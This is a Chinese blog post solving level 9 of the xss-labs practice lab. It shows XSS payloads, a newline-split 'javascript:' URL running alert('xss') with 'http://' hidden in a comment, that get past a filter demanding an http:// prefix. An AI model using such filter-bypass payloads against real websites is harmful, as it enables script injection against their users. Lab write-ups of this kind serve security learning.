xss-labs level 9

管理员 2020-03-12 PM 246℃ 3条

1.这题的过滤规则跟上一题差不多，只不过对输入的数据进行判断有没有带"http://"这个协议头。

2.那也就是说我们输入的数据必须要带有"http://"才可以，

上一题的paylaod:

javascrip%0at:alert('xss')

我们需要添加"http://"进去而且不妨碍原代码的执行，那么可以使用注释法

javascrip%0at:alert('xss')<!--http://-->
javascrip%0at:alert('xss')//http://
javascrip%0at:alert('xss')/*http://*/

提交后，绕过了检查

然后点击超链接会执行javascript代码

标签: 注释绕过

非特殊说明，本博所有文章均为博主原创。

上一篇 xss-labs level 8

下一篇 xss-labs level 10

XSS-labs练习笔记 – 0verflow's blog

[…] xss-labs level 9 […]
回复 2020-03-12 14:49
1

1
回复 2024-02-16 22:33
1

1
回复 2024-02-16 22:51